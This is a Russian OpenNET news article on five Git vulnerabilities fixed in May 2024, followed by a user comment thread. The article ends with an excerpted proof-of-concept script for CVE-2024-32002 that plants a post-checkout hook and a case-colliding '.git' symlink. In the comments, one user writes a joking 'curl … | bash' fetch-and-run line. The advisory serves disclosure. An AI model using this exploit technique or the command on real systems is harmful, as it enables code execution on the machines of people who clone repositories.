The OpenNET Project / Index page

[ новости /+++ | форум | теги | ]

Пять уязвимостей в Git, среди которых одна критическая и две опасные

15.05.2024 23:58

Опубликованы корректирующие выпуски распределённой системы управления исходными текстами Git 2.45.1, 2.44.1, 2.43.4, 2.42.2, 2.41.1, 2.40.2 и 2.39.4, в которых устранены пять уязвимостей. Наиболее серьёзная уязвимость (CVE-2024-32002), которой присвоен критический уровень опасности, позволяет добиться выполнения кода злоумышленника при выполнении клонирования командой "git clone" репозитория, подконтрольного атакующему.

Уязвимость проявляется только в файловых системах, не различающих регистр символов и поддерживающих символические ссылки, например, используемых по умолчанию в Windows и macOS. Эксплуатация осуществляется через создание в субмодуле каталога и символической ссылки, отличающихся только регистром символов, что позволяет добиться записи файлов в каталог .git/, вместо рабочего каталога субмодуля. Получив возможность записи в .git/ атакующий может переопределить hook-вызовы через .git/hooks и добиться выполнения произвольного кода во время выполнения операции "git clone".

Другие уязвимости:

  • CVE-2024-32004 - атакующий в многопользовательской системе может подготовить специально оформленный локальный репозиторий и добиться выполнения кода при его клонировании. В частности, атакующий может создать локальный репозиторий, выглядящий как частичный клон, в котором отсутствует определённый объект. Клонирование этого репозитория приведёт к выполнению кода с правами пользователя, выполняющего операцию клонирования.
  • CVE-2024-32465 - клонирование из zip-архивов, содержащих полный git-репозиторий, включающий hook-и в каталоге .git/, приведёт к выполнению этих hook-ов.
  • CVE-2024-32020 - создание локальных клонов репозитория на том же диске в многопользовательской системе позволяет другим пользователям изменить файлы, для которых задействованы жёсткие ссылки.
  • CVE-2024-32021 - клонирование локального репозитория с символическими ссылками может использоваться для создания жёстких ссылок на произвольные файлы в каталоге objects/.

Помимо устранения уязвимостей в новых версиях также предложено несколько изменений, нацеленных на повышение защиты от уязвимостей, приводящих к удалённому выполнению кода и манипулирующих символическими ссылками при выполнения клонирования. Например, git теперь выдаёт предупреждение при наличии символических ссылок в каталоге .git/. Пути к субмодулям отныне могут содержать только реальные каталоги. При пересечении символических ссылок и каталогов, обрабатываются каталоги. При выполнении "git clone" добавлена защита от выполнения hook-ов во время клонирования и усилены проверки параметра core.hooksPath.

Дополнение: Опубликован подробный разбор техники эксплуатации уязвимости CVE-2024-32002 и пример эксплоита для создания репозиториев, при клонировании которых командой "git clone --recursive " выполняется заданный атакующим код.


   ...
   cat > y/hooks/post-checkout <EOF
   #!/bin/bash
   calc.exe
   open -a Calculator.app
   EOF

   chmod +x y/hooks/post-checkout
   git add y/hooks/post-checkout
   git commit -m "post-checkout"

   cd ..
   hook_repo_path="$(pwd)/hook"

   git init captain
   cd captain
   git submodule add --name x/y "$hook_repo_path" A/modules/x
   git commit -m "add-submodule"

   printf ".git" > dotgit.txt
   git hash-object -w --stdin < dotgit.txt > dot-git.hash
   printf "120000 %s 0\ta\n" "$(cat dot-git.hash)" > index.info
   git update-index --index-info < index.info
   git commit -m "add-symlink"


  1. Главная ссылка к новости (https://lkml.org/lkml/2024/5/1...)
  2. OpenNews: Уязвимости в Git, позволяющие перезаписать файлы или выполнить свой код
  3. OpenNews: Уязвимости в Git, приводящие к утечке и перезаписи данных
  4. OpenNews: Две уязвимости в Git, способные привести к удалённому выполнению кода
  5. OpenNews: Уязвимости в Git, проявляющиеся при клонировании субмодулей и использовании git shell
  6. OpenNews: Обновление Git с устранением уязвимости, допускающей удалённое выполнение кода
Лицензия: CC BY 3.0
Короткая ссылка: https://opennet.ru/61180-git
Ключевые слова: git
При перепечатке указание ссылки на opennet.ru обязательно


Обсуждение (77) Ajax | 1 уровень | Линейный | +/- | Раскрыть всё | RSS
  • 1.1, Аноним (1), 00:25, 16/05/2024 [ответить] [﹢﹢﹢] [ · · · ]  
  • +/
    Для симлинков в винде нужны права администратора.
     
     
  • 2.5, Аноним (1), 00:32, 16/05/2024 [^] [^^] [^^^] [ответить]  
  • –2 +/
    Вернее не права администратора, а SeCreateSymbolicLinkPrivilege (которая обычно даётся при "Запустить от имени админестратора").
     
  • 2.6, нах. (?), 00:39, 16/05/2024 [^] [^^] [^^^] [ответить]  
  • +/
    найди мне модного современного разработчика-под-линукс не выклянчившего/вымутившего/вышантажировавшего себе админских прав на своей вянде?

     
     
  • 3.11, pavlinux (ok), 00:50, 16/05/2024 [^] [^^] [^^^] [ответить]  
  • –1 +/
    Ну я, чо дальше? :
     
     
  • 4.16, Аноним (16), 01:07, 16/05/2024 [^] [^^] [^^^] [ответить]  
  • +5 +/
    Непонятно, зачем нужен эксплойт, если можно сказать ему запустить 'curl https://github.com/jiatan/pwnd/blob/master/install.sh | bash', и он запустит
     
     
  • 5.32, Аноним (32), 06:21, 16/05/2024 [^] [^^] [^^^] [ответить]  
  • +3 +/
    Между git и curl | bash большая разница. Человек, запускающий curl | bash, понимает, что запустит код. А при клонировании git-репозиториев код должен только скачиваться, но не запускаться - но таки запускается. Это как если бы при просмотре специально подготовленной картинки все куки из браузера отправлялись кому не надо.
     
     
  • 6.53, кент кента (?), 11:47, 16/05/2024 [^] [^^] [^^^] [ответить]  
  • +/
    >Человек, запускающий curl | bash, понимает, что запустит код.

    но если скрипт больше 5 строчек, то проверять всё равно лень

     
     
  • 7.84, Аноним (84), 12:16, 18/05/2024 [^] [^^] [^^^] [ответить]  
  • +/
    "Две большие разницы" - заинтересовать запуском скрипта и заинтересовать просмотром кода.

    Скрипты запускают неинтересные хомки.
    А почитать код любят куда более интересные люди.

     
  • 4.35, User (??), 07:30, 16/05/2024 [^] [^^] [^^^] [ответить]  
  • +1 +/
    Этож как накосячить-то надо было, чтоб совсем-совсем не выдали, а? Порнобаннеров с шифррвальщиками с варезника нацеплял, или что?
     
     
  • 5.40, Аноним (40), 09:49, 16/05/2024 [^] [^^] [^^^] [ответить]  
  • +1 +/
    варианта с отсутствием венды не рассматривали совсем? по какой причине?
     
     
  • 6.51, User (??), 11:29, 16/05/2024 [^] [^^] [^^^] [ответить]  
  • +3 +/
    Ну, иногда ж работать приходится, а не только конфиг vim а вылизывать - и если э... большой текст свёрнут, показать
     
     
  • 7.61, Аноним (61), 16:27, 16/05/2024 [^] [^^] [^^^] [ответить]  
  • +1 +/
    Ну не знаю Винды не видел уже года с 2009-го, в последнее время вообще ни с чем... большой текст свёрнут, показать
     
     
  • 8.64, User (??), 18:12, 16/05/2024 [^] [^^] [^^^] [ответить]  
  • +/
    gt оверквотинг удален Ну в общем хотелось бы как-то так - но по роду деятельно... большой текст свёрнут, показать
     
     
  • 9.69, Аноним (61), 19:20, 16/05/2024 [^] [^^] [^^^] [ответить]  
  • +1 +/
    А, ну да, с такими тяжело Сочувствую Я предпочитаю работать с малым-средним ча... текст свёрнут, показать
     
     
  • 10.74, Аноним (-), 04:42, 17/05/2024 [^] [^^] [^^^] [ответить]  
  • +1 +/
    Вот, еще 1 анон понимает прелести подобных направлений А ты дорогой user наслаж... большой текст свёрнут, показать
     
     
  • 11.87, User (??), 12:14, 20/05/2024 [^] [^^] [^^^] [ответить]  
  • +/
    Ну в общем не буду спорить - все так и есть У каждого выбора свои плюсы и свои ... текст свёрнут, показать
     
     
  • 12.88, Аноним (-), 16:55, 20/05/2024 [^] [^^] [^^^] [ответить]  
  • +/
    Опция жить как рабу - мне чем-то не нравится Я понял что возможность пойти попл... большой текст свёрнут, показать
     
     
  • 13.91, User (??), 20:37, 20/05/2024 [^] [^^] [^^^] [ответить]  
  • +/
    Я кажись понял, в чем тут у нас расхожденья Пред-по-ла-гаю, что если карьеру на... большой текст свёрнут, показать
     
  • 12.89, Аноним (-), 16:57, 20/05/2024 [^] [^^] [^^^] [ответить]  
  • +/
    p s и да, ты не можешь себе даже близко представить как я ненавижу все эти тво... текст свёрнут, показать
     
     
  • 13.92, User (??), 20:40, 20/05/2024 [^] [^^] [^^^] [ответить]  
  • +/
    Ну, не всем же в ларьке по продаже кока-колы, работать, да Кому-то вот приходит... большой текст свёрнут, показать
     
  • 7.85, Рмшъ (?), 11:03, 20/05/2024 [^] [^^] [^^^] [ответить]  
  • +/
    Есть ведь и фронтендеры на удалёнке. Переговорки не актуальны, с заказчиками общается менеджер, по vpn ходит бэкендер, госты вообще в последний раз были в универе ещё до Медведева.
     
     
  • 8.86, User (??), 11:14, 20/05/2024 [^] [^^] [^^^] [ответить]  
  • +/
    если эта работа не сводится к программировай-администрировай И то - с нюанса... текст свёрнут, показать
     
  • 5.42, нах. (?), 09:52, 16/05/2024 [^] [^^] [^^^] [ответить]  
  • +1 +/
    > Этож как накосячить-то надо было, чтоб совсем-совсем не выдали, а? Порнобаннеров с
    > шифррвальщиками с варезника нацеплял, или что?

    небось как тот инженер у нас - "а я уже диск отформатировал, дайте установочный, пазазя".

    Видимо что-то там такое было, что нам показывать никак нельзя.

     
  • 2.33, Аноним (33), 06:36, 16/05/2024 [^] [^^] [^^^] [ответить]  
  • +/
    Никого не волнует что там в винде происходит
     
     
  • 3.34, Аноним (34), 07:08, 16/05/2024 [^] [^^] [^^^] [ответить]  
  • +/
    То ли дело 2%, ага.
     
     
  • 4.36, Аноним (36), 08:26, 16/05/2024 [^] [^^] [^^^] [ответить]  
  • –1 +/
    ~4.8% без учёта ChromeOS
     
     
  • 5.38, Аноним (34), 08:34, 16/05/2024 [^] [^^] [^^^] [ответить]  
  • +1 +/
    https://radar.yandex.ru/desktop утверждает иное: 2.77% всего недесктопного кроме винды и макоси. В общем на уровне погрешности измерений.
     
     
  • 6.63, Аноним (61), 16:40, 16/05/2024 [^] [^^] [^^^] [ответить]  
  • –1 +/
    Ага, и все в этой статистике - разработчики, использующие git :-)

    Даже на Винде, скорее всего, половина пользуются гитом внутри WSL.

     
     
  • 7.65, Аноним (65), 18:19, 16/05/2024 [^] [^^] [^^^] [ответить]  
  • +/
    На кой? Конкретно у меня под виндой гит нативный стоит, а не в виртуалке с ненужным. За всех остальных говорить не буду, но скорее всего то же самое.
     
  • 7.78, нах. (?), 12:42, 17/05/2024 [^] [^^] [^^^] [ответить]  
  • +/
    > Даже на Винде, скорее всего, половина пользуются гитом внутри WSL.

    на винде гит встроен в visual studio (не шва6одкину подделку а настоящую)

    Прям при запуске спрашивает тебя - откуда тебе начекаутить и куда потом пульнуть. "проекты" в "новаяпапка 244" у MS давно уже немодно, они развивают технологии.

     
     
  • 8.79, Аноним (79), 13:57, 17/05/2024 [^] [^^] [^^^] [ответить]  
  • +/
    Ко встроенным эта уязвимость не относится же Или там не что-то вроде libgit2, а... текст свёрнут, показать
     
     
  • 9.83, нах. (?), 19:32, 17/05/2024 [^] [^^] [^^^] [ответить]  
  • +/
    да скорее всего именно консольный, вдруг тебе понадобится что-то нестандартное с... текст свёрнут, показать
     
  • 8.81, Аноним (81), 14:23, 17/05/2024 [^] [^^] [^^^] [ответить]  
  • +1 +/
    это какой-то позор Такая огромная компания с миллиардными доходами и полной мон... текст свёрнут, показать
     
     
  • 9.82, нах. (?), 19:30, 17/05/2024 [^] [^^] [^^^] [ответить]  
  • +2 +/
    ну да, ну да, одного Пара сотен разработчиков кажется, кто-то работал на MS н... текст свёрнут, показать
     
  • 2.46, Да ну нахер (?), 10:09, 16/05/2024 [^] [^^] [^^^] [ответить]  
  • +/
    Можно в режим разработчика перевести, тогда не нужны. Правда нужны права на сам перевод.
     

  • 1.3, Аноним (3), 00:26, 16/05/2024 [ответить] [﹢﹢﹢] [ · · · ]  
  • +7 +/
    > приведёт к выполнению этих hook-ов

    Хуки -- мерзотнейшая штука. Сразу вырубаю эту херню к чертям собачьим. К примеру, в веб-проектах хуки устанавливаются таким куском фекалий, как npm-пакет husky. Прикиньте, делаю гит коммит, не имея nodejs в $PATH, и тут вдруг гит ругается, что хук ругается, что nodejs не найден. Я на такое как бы не подписывался, какого ху_ гит запускает какой-то васянский код при гит-коммите? Ах да, postinstall-скрипты тоже надо вырубать нахрен через .npmrc. Если вы этого не сделали, любой васян из интернета сможет запускать код под вашими правами и воровать ваш ~/.config/chromium. Посчитать, скольки васянам вы даете полные права на вашу систему: find node_modules -name package.json | wc -l

     
     
  • 2.4, Аноним (1), 00:29, 16/05/2024 [^] [^^] [^^^] [ответить]  
  • +1 +/
    >хуки устанавливаются таким куском фекалий, как npm-пакет husky

    Так и запишем: "вредоносное ПО".

     
     
  • 3.48, Аноним (-), 10:35, 16/05/2024 [^] [^^] [^^^] [ответить]  
  • +1 +/
    >> хуки устанавливаются таким куском фекалий, как npm-пакет husky
    > Так и запишем: "вредоносное ПО".

    NPM состоит из него чуть менее чем полностью. И репа и сама эта штука.

     
  • 2.8, Васян (?), 00:47, 16/05/2024 [^] [^^] [^^^] [ответить]  
  • +3 +/
    Так тут не git, а npm пачкает все фекалиями
     
     
  • 3.60, Бывалый Смузихлёб (ok), 15:22, 16/05/2024 [^] [^^] [^^^] [ответить]  
  • +/
    > Так тут не git, а npm пачкает все фекалиями

    пачкают, зачастую, cильно умные проггеры-олимпиадники
    Мол, а давайте, чтобы был не просто коммит, а ещё и целая куча гомна исполнялась, которая может падать при любом чихе и код заливаться не будет. А, где нет залитого кода - там нет и начала сборки по событию в рамках СИ/СД. Разумеется, с подтягиванием горы пакетов, включая устаревшие и не очень-то работающие где-то кроме одной-единственной ОС одной конкретной версии

    В итоге, задача на 15 мин запросто превращается в задачу на день с ковырянием даром ненужной ерунды, а то и несколько дней, если предстоят выходные и праздники

     
  • 2.14, Витюшка (?), 00:57, 16/05/2024 [^] [^^] [^^^] [ответить]  
  • +5 +/
    Так это касается любых языков программирования и систем сборки и репозиториев и любых пакетов дистрибутива - там тоже выполняются postinstall bash-портянки, только от рута уже.

    Проблема в ужасной "безопасности" Linux для десктопов. Когда любой Вася получает доступ ко всему home. Мне как раз на системные файлы плевать - снёс/заново установил и проблем нет.

     
     
  • 3.29, penetrator (?), 03:14, 16/05/2024 [^] [^^] [^^^] [ответить]  
  • +/
    это касается не только Linux
     
  • 3.37, Аноним (36), 08:30, 16/05/2024 [^] [^^] [^^^] [ответить]  
  • +/
    >Мне как раз на системные файлы плевать - снёс/заново установил и проблем нет.

    Ага, только если вовремя заметил/догадался, что это срочно необходимо сделать.

     
  • 3.56, Аноним (56), 14:35, 16/05/2024 [^] [^^] [^^^] [ответить]  
  • +/
    Стандартные пакеты ревьювят, а хлам от JS мaкaк - нет
     
  • 2.17, Аноним (17), 01:43, 16/05/2024 [^] [^^] [^^^] [ответить]  
  • –1 +/
    NPM по хорошему в докер убирать надо.
     
     
  • 3.20, Аноним (20), 02:08, 16/05/2024 [^] [^^] [^^^] [ответить]  
  • +2 +/
    Попрошу ещё поглубже, пожалуйста
     
  • 3.25, Аноним (25), 02:35, 16/05/2024 [^] [^^] [^^^] [ответить]  
  • –1 +/
    Докер стоит денег. И в целом от этой проблемы вас не спасёт.
     
  • 3.49, Аноним (-), 10:36, 16/05/2024 [^] [^^] [^^^] [ответить]  
  • +/
    > NPM по хорошему в докер убирать надо.

    А там бэкдор типа нещитово? :)

     
  • 2.68, Аноним (68), 18:41, 16/05/2024 [^] [^^] [^^^] [ответить]  
  • +/
    > Хуки -- мерзотнейшая штука

    Абсолютно солидарен! ЛЮБОЙ формат, позволяющий "немножко скриптогадить", фтопку. Я удивился, что даже шрифты(!!!!) могут исполнять код - вот уж где крыса навнедряла!

     
     
  • 3.80, Аноним (79), 14:02, 17/05/2024 [^] [^^] [^^^] [ответить]  
  • +/
    Это всё привет от технологий начала 80-х, когда засунуть везде свой Тьюринг-полный DSL казалось прекрасной идеей - гибко же ж. До червя Морриса оставалось ещё 5 лет.
     

  • 1.12, pavlinux (ok), 00:51, 16/05/2024 [ответить] [﹢﹢﹢] [ · · · ]  
  • –8 +/
    > позволяет добиться выполнения кода злоумышленника при выполнении клонирования командой "git clone"

    позволяет добиться выполнения кода при выполнении кода // fixed

    > Клонирование этого репозитория приведёт к выполнению кода с правами пользователя, выполняющего операцию клонирования.

    выполнению кода с правами пользователя, выполняющего код // fixed

     
     
  • 2.31, Аноним (31), 06:03, 16/05/2024 [^] [^^] [^^^] [ответить]  
  • +2 +/
    Выполняется не код, а команда. С нежелательными побочными эффектами - после ожидаемого клонирования репозитория тебе еще неожиданно сносят хомяк.
     
     
  • 3.43, нах. (?), 09:53, 16/05/2024 [^] [^^] [^^^] [ответить]  
  • +1 +/
    > Выполняется не код, а команда. С нежелательными побочными эффектами - после ожидаемого
    > клонирования репозитория тебе еще неожиданно сносят хомяк.

    не, ну вот сносить-то зачем? Чо вы как эти вот самые. Не сносить а добавить. Строчечку в authorized_keys , парочку сервисов, ну еще по мелочи.

     
     
  • 4.76, Аноним (76), 04:47, 17/05/2024 [^] [^^] [^^^] [ответить]  
  • +/
    >> Выполняется не код, а команда. С нежелательными побочными эффектами - после ожидаемого
    >> клонирования репозитория тебе еще неожиданно сносят хомяк.
    > не, ну вот сносить-то зачем? Чо вы как эти вот самые. Не
    > сносить а добавить. Строчечку в authorized_keys , парочку сервисов, ну еще
    > по мелочи.

    Да нафиг, каждому горе майнтайнеру - по мaйнeру! А такие как ты даже и добровольно запустят, если процент предложить. Главное чтобы шеф не спалил что кошель твой.

     
     
  • 5.77, нах. (?), 12:38, 17/05/2024 [^] [^^] [^^^] [ответить]  
  • +/
    > А такие как ты даже и добровольно запустят, если процент предложить.

    у тебя бабла не хватит покрыть все риски и косвенные ущербы. А я умею считать.

    > Главное чтобы шеф не спалил что кошель твой.

    главное чтоб шеф не узнал про краденные тележки в Кельне.

     
     
  • 6.90, Аноним (-), 17:05, 20/05/2024 [^] [^^] [^^^] [ответить]  
  • +/
    >> А такие как ты даже и добровольно запустят, если процент предложить.
    > у тебя бабла не хватит покрыть все риски и косвенные ущербы. А я умею считать.

    Да вот хрен там. Если бы ты реально умел считать, сделал бы это все в 2009, а сейчас - махал бы всем тут факом, через старлинк какой, попивая дорогое бухлецо на своей личной яхте... ну или по крайней мере мог бы не работать до гроба жизни, ощущая себя белым человеком, если так светиться успехом счета обломно. И локация была б поприличнее, без бддлогопов "в товарном количестве".

    >> Главное чтобы шеф не спалил что кошель твой.
    > главное чтоб шеф не узнал про краденные тележки в Кельне.

    Что еще за тележки?

     

  • 1.13, Аноним (13), 00:55, 16/05/2024 [ответить] [﹢﹢﹢] [ · · · ]  
  • +/
    Я помню в одной конторе настроили хуки так что оно писало об изменениях в программе в slack (пока этот чат не стал платным для владельца). Двоякое ощущение - вроде бы и удобно для менеджмента, а вроде бы как и не очень - отвлекало немного. А ещё когда делают процесс с код-ревью и мелкими задачами, так вообще не айс.
     
     
  • 2.62, Аноним (61), 16:38, 16/05/2024 [^] [^^] [^^^] [ответить]  
  • +/
    Так это обычно в отдельный канал в Слаке делают. Я это сразу в mute отправляю, намного гибче через email с уведомлениями по фильтрам только на нужное. Ну кому-то удобно, пусть читают, я ж не против.
     

  • 1.19, Аноним (19), 02:00, 16/05/2024 [ответить] [﹢﹢﹢] [ · · · ]  
  • –1 +/
    > например, используемых по умолчанию в Windows и macOS

    Тот кто писал, явно не работал с macOS

     
     
  • 2.23, Аноним (23), 02:19, 16/05/2024 [^] [^^] [^^^] [ответить]  
  • +2 +/
    Ну вообще-то apfs которая используется на системном диске как раз case insensitive. Так что если ты застрял на hfs+ со своим макбуком 2008 года с авито, то с разморозочкой.
     
     
  • 3.28, Аноним (28), 03:11, 16/05/2024 [^] [^^] [^^^] [ответить]  
  • +/
    А я-то думал, откуда это лишение фич прогрессом обзывают. А оно вон как, the usual suspects. Не сидится им на маке почему-то.
     
     
  • 4.30, Аноним (23), 03:38, 16/05/2024 [^] [^^] [^^^] [ответить]  
  • +/
    > лишение фич

    И опять ты пaльцeм в гyзнo попал 😆 Но даже не буду oбъяcнять почему, уж извольте-с.

     
  • 4.44, нах. (?), 09:55, 16/05/2024 [^] [^^] [^^^] [ответить]  
  • +2 +/
    > А я-то думал, откуда это лишение фич прогрессом обзывают.

    это добавление. Наконец-то системе объяснили что никому на самом деле не нужны File fIle и file и скорее всего все три раза имелось в виду одно и то же. Это в 70м году никак невозможно было такую сложную логику уместить в 16k

    Но есть нюанс...

     
     
  • 5.54, Аноним (28), 13:18, 16/05/2024 [^] [^^] [^^^] [ответить]  
  • +/
    >никому на самом деле не нужны File fIle и file и скорее всего все три раза имелось в виду одно и то же

    Всегда делаю в шелле для обхода окружений алиасы/функции вида CP, INSTALL, SH. Страдайте.

     
  • 5.58, Аноним (56), 14:39, 16/05/2024 [^] [^^] [^^^] [ответить]  
  • –5 +/
    Да, есть нюанс: теперь своим нюансом собираете кучу багов в разном софте. Выбор макоси разработчиком такой же признак проф непригодности, как и выбор винды
     
     
  • 6.59, нах. (?), 14:46, 16/05/2024 [^] [^^] [^^^] [ответить]  
  • +4 +/
    > Да, есть нюанс: теперь своим нюансом собираете кучу багов в разном софте.
    > Выбор макоси разработчиком такой же признак проф непригодности, как и выбор
    > винды

    профпригодный подвальный пришел порассуждать о выборах разработчиков.

    Тебя от канализационной трубы-то вообще кто отцепил?


     
  • 6.70, Аноним (70), 20:44, 16/05/2024 [^] [^^] [^^^] [ответить]  
  • +1 +/
    >  Выбор макоси разработчиком такой же признак проф непригодности

    Настоящий труЪ погромистЪ должОн сидеть на коредуба с и дебьяне с крысой? Ннада так полагать? 🌚

     
     
  • 7.71, Аноним (25), 00:49, 17/05/2024 [^] [^^] [^^^] [ответить]  
  • –1 +/
    Вставлю своё примечание в ваш разговор в ответ именно на это сообщение - на gentoo или arch в таком уж случае. А в целом настоящий программист? Смешно звучит. Это как у баб - настоящий мужик должен...
     
  • 6.72, Аноним (25), 00:53, 17/05/2024 [^] [^^] [^^^] [ответить]  
  • +/
    О, а что вы скажете о пользователях айфона и маках? Полагаю именно это клиенты этого американского подделия и именно для них сей человек программирует.
     

  • 1.24, Изя (?), 02:31, 16/05/2024 [ответить] [﹢﹢﹢] [ · · · ]  
  • +/
    И две смешные
     
  • 1.39, 1 (??), 09:25, 16/05/2024 [ответить] [﹢﹢﹢] [ · · · ]  
  • +/
    А вот у меня вопрос - откуда столько версий git ? Аж 7 в этой новости насчитал. Типа для каждого питона свой гит ?
     
     
  • 2.45, нах. (?), 09:56, 16/05/2024 [^] [^^] [^^^] [ответить]  
  • +/
    > А вот у меня вопрос - откуда столько версий git ? Аж
    > 7 в этой новости насчитал. Типа для каждого питона свой гит
    > ?

    для некоторых можно и не жадничать, и использовать два - например для самого питона один а для модулей еще оди... четыре. Что мы, жадные что ли?


     

  • 1.47, Аноним (-), 10:33, 16/05/2024 [ответить] [﹢﹢﹢] [ · · · ]  
  • +/
    > Уязвимость проявляется только в файловых системах,
    > не различающих регистр символов

    А можно это объявить фичой и не чинить? Прикольно же когда всяких маздайищков можно нагреть по первое число. Я бы с удовольствием комитнул кому-то типа поха чего-нибудь веселое.

     
     
  • 2.66, Аноним (65), 18:21, 16/05/2024 [^] [^^] [^^^] [ответить]  
  • +/
    Сюрприз: чувствительность к регистру в NTFS можно включить если делать нечего. А в файлухах ненужного её можно выключить?
     
     
  • 3.73, Аноним (-), 04:35, 17/05/2024 [^] [^^] [^^^] [ответить]  
  • +/
    > Сюрприз: чувствительность к регистру в NTFS можно включить если делать нечего.

    Ну и какой % юзеров это делает? Вот и ответ на вопрос "сработает ли эксплойт?" :)

    > А в файлухах ненужного её можно выключить?

    В некоторых таки - можно. Но желающие этсамого как раз и откушают наравне с вон теми. И поделом. Ибо когда возникает неоднозначность маппинга "для удоьства" - вы таки конкретно нарываетесь по линии безопасности. Это не первый вулн и не последний. В софте это поведение неудобно учитывать. Прогеры налетали, налетают и будут налетать на этом. Они просто забывают предусмотреть такую ситуацию.

     
     
  • 4.93, Аноним (93), 18:04, 21/05/2024 [^] [^^] [^^^] [ответить]  
  • +/
    Начиная с Windows 10 сборки 17107 чувствительность к регистру можно включить даже для конкретного каталога:

    fsutil.exe file setCaseSensitiveInfo <path> enable

     

  • 1.55, Аноним (56), 14:29, 16/05/2024 [ответить] [﹢﹢﹢] [ · · · ]  
  • +/
    > Уязвимость проявляется только в файловых системах, не различающих регистр символов...

    Это же фича, а не баг

     

     Добавить комментарий
    Имя:
    E-Mail:
    Текст:



    Партнёры:
    PostgresPro
    Inferno Solutions
    Hosting by Hoster.ru
    Хостинг:

    Закладки на сайте
    Проследить за страницей
    Created 1996-2024 by Maxim Chirkov
    Добавить, Поддержать, Вебмастеру